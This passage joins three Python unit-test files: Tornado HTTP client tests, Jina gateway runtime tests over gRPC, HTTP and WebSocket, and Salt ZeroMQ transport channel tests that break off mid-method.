url("/all_methods", AllMethodsHandler),
], gzip=True)
def test_hello_world(self):
response = self.fetch("/hello")
self.assertEqual(response.code, 200)
self.assertEqual(response.headers["Content-Type"], "text/plain")
self.assertEqual(response.body, b"Hello world!")
self.assertEqual(int(response.request_time), 0)
response = self.fetch("/hello?name=Ben")
self.assertEqual(response.body, b"Hello Ben!")
def test_streaming_callback(self):
# streaming_callback is also tested in test_chunked
chunks = []
response = self.fetch("/hello",
streaming_callback=chunks.append)
# with streaming_callback, data goes to the callback and not response.body
self.assertEqual(chunks, [b"Hello world!"])
self.assertFalse(response.body)
def test_post(self):
response = self.fetch("/post", method="POST",
body="arg1=foo&arg2=bar")
self.assertEqual(response.code, 200)
self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_chunked(self):
response = self.fetch("/chunk")
self.assertEqual(response.body, b"asdfqwer")
chunks = []
response = self.fetch("/chunk",
streaming_callback=chunks.append)
self.assertEqual(chunks, [b"asdf", b"qwer"])
self.assertFalse(response.body)
def test_chunked_close(self):
# test case in which chunks spread read-callback processing
# over several ioloop iterations, but the connection is already closed.
sock, port = bind_unused_port()
with closing(sock):
def write_response(stream, request_data):
stream.write(b"""\
HTTP/1.1 200 OK
Transfer-Encoding: chunked
1
1
1
2
0
""".replace(b"\n", b"\r\n"), callback=stream.close)
def accept_callback(conn, address):
# fake an HTTP server using chunked encoding where the final chunks
# and connection close all happen at once
stream = IOStream(conn, io_loop=self.io_loop)
stream.read_until(b"\r\n\r\n",
functools.partial(write_response, stream))
netutil.add_accept_handler(sock, accept_callback, self.io_loop)
self.http_client.fetch("http://127.0.0.1:%d/" % port, self.stop)
resp = self.wait()
resp.rethrow()
self.assertEqual(resp.body, b"12")
self.io_loop.remove_handler(sock.fileno())
def test_streaming_stack_context(self):
chunks = []
exc_info = []
def error_handler(typ, value, tb):
exc_info.append((typ, value, tb))
return True
def streaming_cb(chunk):
chunks.append(chunk)
if chunk == b'qwer':
1 / 0
with ExceptionStackContext(error_handler):
self.fetch('/chunk', streaming_callback=streaming_cb)
self.assertEqual(chunks, [b'asdf', b'qwer'])
self.assertEqual(1, len(exc_info))
self.assertIs(exc_info[0][0], ZeroDivisionError)
def test_basic_auth(self):
self.assertEqual(self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame").body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==")
def test_basic_auth_explicit_mode(self):
self.assertEqual(self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame",
auth_mode="basic").body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==")
def test_unsupported_auth_mode(self):
# curl and simple clients handle errors a bit differently; the
# important thing is that they don't fall back to basic auth
# on an unknown mode.
with ExpectLog(gen_log, "uncaught exception", required=False):
with self.assertRaises((ValueError, HTTPError)):
response = self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame",
auth_mode="asdf")
response.rethrow()
def test_follow_redirect(self):
response = self.fetch("/countdown/2", follow_redirects=False)
self.assertEqual(302, response.code)
self.assertTrue(response.headers["Location"].endswith("/countdown/1"))
response = self.fetch("/countdown/2")
self.assertEqual(200, response.code)
self.assertTrue(response.effective_url.endswith("/countdown/0"))
self.assertEqual(b"Zero", response.body)
def test_credentials_in_url(self):
url = self.get_url("/auth").replace("http://", "http://me:secret@")
self.http_client.fetch(url, self.stop)
response = self.wait()
self.assertEqual(b"Basic " + base64.b64encode(b"me:secret"),
response.body)
def test_body_encoding(self):
unicode_body = u("\xe9")
byte_body = binascii.a2b_hex(b"e9")
# unicode string in body gets converted to utf8
response = self.fetch("/echopost", method="POST", body=unicode_body,
headers={"Content-Type": "application/blah"})
self.assertEqual(response.headers["Content-Length"], "2")
self.assertEqual(response.body, utf8(unicode_body))
# byte strings pass through directly
response = self.fetch("/echopost", method="POST",
body=byte_body,
headers={"Content-Type": "application/blah"})
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
# Mixing unicode in headers and byte string bodies shouldn't
# break anything
response = self.fetch("/echopost", method="POST", body=byte_body,
headers={"Content-Type": "application/blah"},
user_agent=u("foo"))
self.assertEqual(response.headers["Content-Length"], "1")
self.assertEqual(response.body, byte_body)
def test_types(self):
response = self.fetch("/hello")
self.assertEqual(type(response.body), bytes_type)
self.assertEqual(type(response.headers["Content-Type"]), str)
self.assertEqual(type(response.code), int)
self.assertEqual(type(response.effective_url), str)
def test_header_callback(self):
first_line = []
headers = {}
chunks = []
def header_callback(header_line):
if header_line.startswith('HTTP/'):
first_line.append(header_line)
elif header_line != '\r\n':
k, v = header_line.split(':', 1)
headers[k] = v.strip()
def streaming_callback(chunk):
# All header callbacks are run before any streaming callbacks,
# so the header data is available to process the data as it
# comes in.
self.assertEqual(headers['Content-Type'], 'text/html; charset=UTF-8')
chunks.append(chunk)
self.fetch('/chunk', header_callback=header_callback,
streaming_callback=streaming_callback)
self.assertEqual(len(first_line), 1)
self.assertRegexpMatches(first_line[0], 'HTTP/1.[01] 200 OK\r\n')
self.assertEqual(chunks, [b'asdf', b'qwer'])
def test_header_callback_stack_context(self):
exc_info = []
def error_handler(typ, value, tb):
exc_info.append((typ, value, tb))
return True
def header_callback(header_line):
if header_line.startswith('Content-Type:'):
1 / 0
with ExceptionStackContext(error_handler):
self.fetch('/chunk', header_callback=header_callback)
self.assertEqual(len(exc_info), 1)
self.assertIs(exc_info[0][0], ZeroDivisionError)
def test_configure_defaults(self):
defaults = dict(user_agent='TestDefaultUserAgent', allow_ipv6=False)
# Construct a new instance of the configured client class
client = self.http_client.__class__(self.io_loop, force_instance=True,
defaults=defaults)
client.fetch(self.get_url('/user_agent'), callback=self.stop)
response = self.wait()
self.assertEqual(response.body, b'TestDefaultUserAgent')
client.close()
def test_304_with_content_length(self):
# According to the spec 304 responses SHOULD NOT include
# Content-Length or other entity headers, but some servers do it
# anyway.
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.5
response = self.fetch('/304_with_content_length')
self.assertEqual(response.code, 304)
self.assertEqual(response.headers['Content-Length'], '42')
def test_final_callback_stack_context(self):
# The final callback should be run outside of the httpclient's
# stack_context. We want to ensure that there is not stack_context
# between the user's callback and the IOLoop, so monkey-patch
# IOLoop.handle_callback_exception and disable the test harness's
# context with a NullContext.
# Note that this does not apply to secondary callbacks (header
# and streaming_callback), as errors there must be seen as errors
# by the http client so it can clean up the connection.
exc_info = []
def handle_callback_exception(callback):
exc_info.append(sys.exc_info())
self.stop()
self.io_loop.handle_callback_exception = handle_callback_exception
with NullContext():
self.http_client.fetch(self.get_url('/hello'),
lambda response: 1 / 0)
self.wait()
self.assertEqual(exc_info[0][0], ZeroDivisionError)
@gen_test
def test_future_interface(self):
response = yield self.http_client.fetch(self.get_url('/hello'))
self.assertEqual(response.body, b'Hello world!')
@gen_test
def test_future_http_error(self):
try:
yield self.http_client.fetch(self.get_url('/notfound'))
except HTTPError as e:
self.assertEqual(e.code, 404)
self.assertEqual(e.response.code, 404)
@gen_test
def test_reuse_request_from_response(self):
# The response.request attribute should be an HTTPRequest, not
# a _RequestProxy.
# This test uses self.http_client.fetch because self.fetch calls
# self.get_url on the input unconditionally.
url = self.get_url('/hello')
response = yield self.http_client.fetch(url)
self.assertEqual(response.request.url, url)
self.assertTrue(isinstance(response.request, HTTPRequest))
response2 = yield self.http_client.fetch(response.request)
self.assertEqual(response2.body, b'Hello world!')
def test_all_methods(self):
for method in ['GET', 'DELETE', 'OPTIONS']:
response = self.fetch('/all_methods', method=method)
self.assertEqual(response.body, utf8(method))
for method in ['POST', 'PUT', 'PATCH']:
response = self.fetch('/all_methods', method=method, body=b'')
self.assertEqual(response.body, utf8(method))
response = self.fetch('/all_methods', method='HEAD')
self.assertEqual(response.body, b'')
response = self.fetch('/all_methods', method='OTHER',
allow_nonstandard_methods=True)
self.assertEqual(response.body, b'OTHER')
@gen_test
def test_body(self):
hello_url = self.get_url('/hello')
with self.assertRaises(AssertionError) as context:
yield self.http_client.fetch(hello_url, body='data')
self.assertTrue('must be empty' in str(context.exception))
with self.assertRaises(AssertionError) as context:
yield self.http_client.fetch(hello_url, method='POST')
self.assertTrue('must not be empty' in str(context.exception))
class RequestProxyTest(unittest.TestCase):
def test_request_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/',
user_agent='foo'),
dict())
self.assertEqual(proxy.user_agent, 'foo')
def test_default_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict(network_interface='foo'))
self.assertEqual(proxy.network_interface, 'foo')
def test_both_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/',
proxy_host='foo'),
dict(proxy_host='bar'))
self.assertEqual(proxy.proxy_host, 'foo')
def test_neither_set(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict())
self.assertIs(proxy.auth_username, None)
def test_bad_attribute(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'),
dict())
with self.assertRaises(AttributeError):
proxy.foo
def test_defaults_none(self):
proxy = _RequestProxy(HTTPRequest('http://example.com/'), None)
self.assertIs(proxy.auth_username, None)
class HTTPResponseTestCase(unittest.TestCase):
def test_str(self):
response = HTTPResponse(HTTPRequest('http://example.com'),
200, headers={}, buffer=BytesIO())
s = str(response)
self.assertTrue(s.startswith('HTTPResponse('))
self.assertIn('code=200', s)
class SyncHTTPClientTest(unittest.TestCase):
def setUp(self):
if IOLoop.configured_class().__name__ in ('TwistedIOLoop',
'AsyncIOMainLoop'):
# TwistedIOLoop only supports the global reactor, so we can't have
# separate IOLoops for client and server threads.
# AsyncIOMainLoop doesn't work with the default policy
# (although it could with some tweaks to this test and a
# policy that created loops for non-main threads).
raise unittest.SkipTest(
'Sync HTTPClient not compatible with TwistedIOLoop or '
'AsyncIOMainLoop')
self.server_ioloop = IOLoop()
sock, self.port = bind_unused_port()
app = Application([('/', HelloWorldHandler)])
self.server = HTTPServer(app, io_loop=self.server_ioloop)
self.server.add_socket(sock)
self.server_thread = threading.Thread(target=self.server_ioloop.start)
self.server_thread.start()
self.http_client = HTTPClient()
def tearDown(self):
def stop_server():
self.server.stop()
self.server_ioloop.stop()
self.server_ioloop.add_callback(stop_server)
self.server_thread.join()
self.http_client.close()
self.server_ioloop.close(all_fds=True)
def get_url(self, path):
return 'http://localhost:%d%s' % (self.port, path)
def test_sync_client(self):
response = self.http_client.fetch(self.get_url('/'))
self.assertEqual(b'Hello world!', response.body)
def test_sync_client_error(self):
# Synchronous HTTPClient raises errors directly; no need for
# response.rethrow()
with self.assertRaises(HTTPError) as assertion:
self.http_client.fetch(self.get_url('/notfound'))
self.assertEqual(assertion.exception.code, 404)
class HTTPRequestTestCase(unittest.TestCase):
def test_headers(self):
request = HTTPRequest('http://example.com', headers={'foo': 'bar'})
self.assertEqual(request.headers, {'foo': 'bar'})
def test_headers_setter(self):
request = HTTPRequest('http://example.com')
request.headers = {'bar': 'baz'}
self.assertEqual(request.headers, {'bar': 'baz'})
def test_null_headers_setter(self):
request = HTTPRequest('http://example.com')
request.headers = None
self.assertEqual(request.headers, {})
def test_body(self):
request = HTTPRequest('http://example.com', body='foo')
self.assertEqual(request.body, utf8('foo'))
def test_body_setter(self):
request = HTTPRequest('http://example.com')
request.body = 'foo'
self.assertEqual(request.body, utf8('foo'))
|
test_clients_gateways.py
|
import asyncio
import copy
import multiprocessing
import time
from typing import Dict
import pytest
from jina import Document, DocumentArray
from jina.helper import random_port
from jina.parsers import set_gateway_parser
from jina.serve import networking
from jina.serve.runtimes.gateway.grpc import GRPCGatewayRuntime
from jina.serve.runtimes.gateway.http import HTTPGatewayRuntime
from jina.serve.runtimes.gateway.websocket import WebSocketGatewayRuntime
from jina.types.request.data import DataRequest
@pytest.fixture
def linear_graph_dict():
return {
'start-gateway': ['deployment0'],
'deployment0': ['deployment1'],
'deployment1': ['deployment2'],
'deployment2': ['deployment3'],
'deployment3': ['end-gateway'],
}
@pytest.fixture
def bifurcation_graph_dict():
return {
'start-gateway': ['deployment0', 'deployment4', 'deployment6'],
'deployment0': ['deployment1', 'deployment2'],
'deployment1': [], # hanging_deployment
'deployment2': ['deployment3'],
'deployment4': ['deployment5'],
'deployment5': ['end-gateway'],
'deployment3': ['deployment5'],
'deployment6': [], # hanging_deployment
}
@pytest.fixture
def merge_graph_dict_directly_merge_in_gateway():
return {
'start-gateway': ['deployment0'],
'deployment0': ['deployment1', 'deployment2'],
'deployment1': ['merger'],
'deployment2': ['merger'],
'merger': ['end-gateway'],
}
@pytest.fixture
def merge_graph_dict_directly_merge_in_last_deployment():
return {
'start-gateway': ['deployment0'],
'deployment0': ['deployment1', 'deployment2'],
'deployment1': ['merger'],
'deployment2': ['merger'],
'merger': ['deployment_last'],
'deployment_last': ['end-gateway'],
}
@pytest.fixture
def complete_graph_dict():
return {
'start-gateway': ['deployment0', 'deployment4', 'deployment6'],
'deployment0': ['deployment1', 'deployment2'],
'deployment1': ['merger'],
'deployment2': ['deployment3'],
'deployment4': ['deployment5'],
'merger': ['deployment_last'],
'deployment5': ['merger'],
'deployment3': ['merger'],
'deployment6': [], # hanging_deployment
'deployment_last': ['end-gateway'],
}
class DummyNoDocAccessMockConnectionPool:
def send_requests_once(
self, requests, deployment: str, head: bool, endpoint: str = None
) -> asyncio.Task:
async def task_wrapper():
import random
await asyncio.sleep(1 / (random.randint(1, 3) * 10))
if requests[0].is_decompressed:
return (
DataRequest(request=requests[0].proto.SerializePartialToString()),
{},
)
else:
return DataRequest(request=requests[0].buffer), {}
return asyncio.create_task(task_wrapper())
class DummyMockConnectionPool:
def send_requests_once(
self, requests, deployment: str, head: bool, endpoint: str = None
) -> asyncio.Task:
assert head
request = requests[0]
response_msg = copy.deepcopy(request)
new_docs = DocumentArray()
docs = request.docs
for doc in docs:
clientid = doc.text[0:7]
new_doc = Document(id=doc.id, text=doc.text + f'-{clientid}-{deployment}')
new_docs.append(new_doc)
response_msg.data.docs = new_docs
async def task_wrapper():
import random
await asyncio.sleep(1 / (random.randint(1, 3) * 10))
return response_msg, {}
return asyncio.create_task(task_wrapper())
def create_runtime(
graph_dict: Dict, protocol: str, port: int, call_counts=None, monkeypatch=None
):
import json
graph_description = json.dumps(graph_dict)
runtime_cls = None
if call_counts:
def decompress(self):
call_counts.put_nowait('called')
from jina.proto import jina_pb2
self._pb_body = jina_pb2.DataRequestProto()
self._pb_body.ParseFromString(self.buffer)
self.buffer = None
monkeypatch.setattr(
DataRequest,
'_decompress',
decompress,
)
if protocol == 'grpc':
runtime_cls = GRPCGatewayRuntime
elif protocol == 'http':
runtime_cls = HTTPGatewayRuntime
elif protocol == 'websocket':
runtime_cls = WebSocketGatewayRuntime
with runtime_cls(
set_gateway_parser().parse_args(
[
'--port',
f'{port}',
'--graph-description',
f'{graph_description}',
'--deployments-addresses',
'{}',
]
)
) as runtime:
runtime.run_forever()
def client_send(client_id: int, port: int, protocol: str):
from jina.clients import Client
c = Client(protocol=protocol, port=port, return_responses=True)
# send requests
return c.post(
on='/', inputs=DocumentArray([Document(text=f'client{client_id}-Request')])
)
NUM_PARALLEL_CLIENTS = 10
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_linear(
linear_graph_dict, monkeypatch, protocol
):
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
assert (
responses[0].docs[0].text
== f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment1-client{client_id}-deployment2-client{client_id}-deployment3'
)
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': linear_graph_dict,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
def test_grpc_gateway_runtime_lazy_request_access(linear_graph_dict, monkeypatch):
call_counts = multiprocessing.Queue()
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyNoDocAccessMockConnectionPool.send_requests_once,
)
port = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port, 'grpc')
assert len(responses) > 0
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': 'grpc',
'port': port,
'graph_dict': linear_graph_dict,
'call_counts': call_counts,
'monkeypatch': monkeypatch,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
assert (
_queue_length(call_counts) == NUM_PARALLEL_CLIENTS * 2
) # request should be decompressed at start and end only
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_bifurcation(
bifurcation_graph_dict, monkeypatch, protocol
):
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port, protocol)
assert len(responses) > 0
# reducing is supposed to happen in the deployments, in the test it will get a single doc in non deterministic order
assert len(responses[0].docs) == 1
assert (
responses[0].docs[0].text
== f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment2-client{client_id}-deployment3'
or responses[0].docs[0].text
== f'client{client_id}-Request-client{client_id}-deployment4-client{client_id}-deployment5'
)
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': bifurcation_graph_dict,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_merge_in_gateway(
merge_graph_dict_directly_merge_in_gateway, monkeypatch, protocol
):
# TODO: Test incomplete until merging of responses is ready
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
deployment1_path = (
f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment1-client{client_id}-merger'
in responses[0].docs[0].text
)
deployment2_path = (
f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment2-client{client_id}-merger'
in responses[0].docs[0].text
)
assert deployment1_path or deployment2_path
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': merge_graph_dict_directly_merge_in_gateway,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_merge_in_last_deployment(
merge_graph_dict_directly_merge_in_last_deployment, monkeypatch, protocol
):
# TODO: Test incomplete until merging of responses is ready
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
deployment1_path = (
f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment1-client{client_id}-merger-client{client_id}-deployment_last'
in responses[0].docs[0].text
)
deployment2_path = (
f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment2-client{client_id}-merger-client{client_id}-deployment_last'
in responses[0].docs[0].text
)
assert deployment1_path or deployment2_path
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': merge_graph_dict_directly_merge_in_last_deployment,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
@pytest.mark.parametrize('protocol', ['grpc', 'http', 'websocket'])
def test_grpc_gateway_runtime_handle_messages_complete_graph_dict(
complete_graph_dict, monkeypatch, protocol
):
# TODO: Test incomplete until merging of responses is ready
monkeypatch.setattr(
networking.GrpcConnectionPool,
'send_requests_once',
DummyMockConnectionPool.send_requests_once,
)
port = random_port()
def client_validate(client_id: int):
responses = client_send(client_id, port, protocol)
assert len(responses) > 0
assert len(responses[0].docs) == 1
# there are 3 incoming paths to merger, it could be any
assert (
f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment1-client{client_id}-merger-client{client_id}-deployment_last'
== responses[0].docs[0].text
or f'client{client_id}-Request-client{client_id}-deployment0-client{client_id}-deployment2-client{client_id}-deployment3-client{client_id}-merger-client{client_id}-deployment_last'
== responses[0].docs[0].text
or f'client{client_id}-Request-client{client_id}-deployment4-client{client_id}-deployment5-client{client_id}-merger-client{client_id}-deployment_last'
== responses[0].docs[0].text
)
p = multiprocessing.Process(
target=create_runtime,
kwargs={
'protocol': protocol,
'port': port,
'graph_dict': complete_graph_dict,
},
)
p.start()
time.sleep(1.0)
client_processes = []
for i in range(NUM_PARALLEL_CLIENTS):
cp = multiprocessing.Process(target=client_validate, kwargs={'client_id': i})
cp.start()
client_processes.append(cp)
for cp in client_processes:
cp.join()
p.terminate()
p.join()
for cp in client_processes:
assert cp.exitcode == 0
def _queue_length(queue: 'multiprocessing.Queue'):
# Pops elements from the queue and counts them
# Used if the underlying queue is sensitive to ordering
# This is used instead of multiprocessing.Queue.qsize() since it is not supported on MacOS
length = 0
while not queue.empty():
queue.get()
length += 1
return length
|
test_zeromq.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Thomas Jackson <jacksontj.89@gmail.com>`
'''
# Import python libs
from __future__ import absolute_import
import os
import time
import threading
# linux_distribution deprecated in py3.7
try:
from platform import linux_distribution
except ImportError:
from distro import linux_distribution
# Import 3rd-party libs
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
from tornado.testing import AsyncTestCase
import tornado.gen
# Import Salt libs
import salt.config
from salt.ext import six
import salt.utils.process
import salt.transport.server
import salt.transport.client
import salt.exceptions
from salt.ext.six.moves import range
from salt.transport.zeromq import AsyncReqMessageClientPool
# Import test support libs
from tests.support.paths import TMP_CONF_DIR
from tests.support.unit import TestCase, skipIf
from tests.support.helpers import flaky, get_unused_localhost_port
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, patch
from tests.unit.transport.mixins import PubChannelMixin, ReqChannelMixin
ON_SUSE = False
if 'SuSE' in linux_distribution(full_distribution_name=False):
ON_SUSE = True
class BaseZMQReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
'''
Test the req server/client pair
'''
@classmethod
def setUpClass(cls):
if not hasattr(cls, '_handle_payload'):
return
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
'master',
**{'transport': 'zeromq',
'auto_accept': True,
'ret_port': ret_port,
'publish_port': publish_port,
'tcp_master_pub_port': tcp_master_pub_port,
'tcp_master_pull_port': tcp_master_pull_port,
'tcp_master_publish_pull': tcp_master_publish_pull,
'tcp_master_workers': tcp_master_workers}
)
cls.minion_config = cls.get_temp_config(
'minion',
**{'transport': 'zeromq',
'master_ip': '127.0.0.1',
'master_port': ret_port,
'auth_timeout': 5,
'auth_tries': 1,
'master_uri': 'tcp://127.0.0.1:{0}'.format(ret_port)}
)
cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
cls.server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_config)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
cls.io_loop.make_current()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(target=cls.io_loop.start)
cls.server_thread.daemon = True
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
if not hasattr(cls, '_handle_payload'):
return
# Attempting to kill the children hangs the test suite.
# Let the test suite handle this instead.
cls.process_manager.stop_restarting()
cls.process_manager.kill_children()
cls.io_loop.add_callback(cls.io_loop.stop)
cls.server_thread.join()
time.sleep(2) # Give the procs a chance to fully close before we stop the io_loop
cls.server_channel.close()
del cls.server_channel
del cls.io_loop
del cls.process_manager
del cls.server_thread
del cls.master_config
del cls.minion_config
@classmethod
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
return payload, {'fun': 'send_clear'}
class ClearReqTestCases(BaseZMQReqCase, ReqChannelMixin):
'''
Test all of the clear msg stuff
'''
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config, crypt='clear')
def tearDown(self):
del self.channel
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send_clear'}))
@flaky
@skipIf(ON_SUSE, 'Skipping until https://github.com/saltstack/salt/issues/32902 gets fixed')
class AESReqTestCases(BaseZMQReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)
def tearDown(self):
del self.channel
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send'}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
#
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#
# WARNING: This test will fail randomly on any system with > 1 CPU core!!!
#
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
def test_badload(self):
'''
Test a variety of bad requests, make sure that we get some sort of error
'''
# TODO: This test should be re-enabled when Jenkins moves to C7.
# Once the version of salt-testing is increased to something newer than the September
# release of salt-testing, the @flaky decorator should be applied to this test.
msgs = ['', [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg, timeout=5)
class BaseZMQPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
'''
Test the req server/client pair
'''
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
'master',
**{'transport': 'zeromq',
'auto_accept': True,
'ret_port': ret_port,
'publish_port': publish_port,
'tcp_master_pub_port': tcp_master_pub_port,
'tcp_master_pull_port': tcp_master_pull_port,
'tcp_master_publish_pull': tcp_master_publish_pull,
'tcp_master_workers': tcp_master_workers}
)
cls.minion_config = salt.config.minion_config(os.path.join(TMP_CONF_DIR, 'minion'))
cls.minion_config = cls.get_temp_config(
'minion',
**{'transport': 'zeromq',
'master_ip': '127.0.0.1',
'master_port': ret_port,
'master_uri': 'tcp://127.0.0.1:{0}'.format(ret_port)}
)
cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
cls.server_channel = salt.transport.server.PubServerChannel.factory(cls.master_config)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_config)
cls.req_server_channel.pre_fork(cls.process_manager)
cls._server_io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls._server_io_loop)
cls.server_thread = threading.Thread(target=cls._server_io_loop.start)
cls.server_thread.daemon = True
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.process_manager.kill_children()
cls.process_manager.stop_restarting()
time.sleep(2) # Give the procs a chance to fully close before we stop the io_loop
cls.io_loop.add_callback(cls.io_loop.stop)
cls.server_thread.join()
cls.req_server_channel.close()
cls.server_channel.close()
cls._server_io_loop.stop()
del cls.server_channel
del cls._server_io_loop
del cls.process_manager
del cls.server_thread
del cls.master_config
del cls.minion_config
@classmethod
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
return payload, {'fun': 'send_clear'}
def setUp(self):
super(BaseZMQPubCase, self).setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super(BaseZMQPubCase, self).tearDown()
failures = []
for k, v in six.iteritems(self.io_loop._handlers):
if self._start_handlers.get(k) != v:
failures.append((k, v))
del self._start_handlers
if len(failures) > 0:
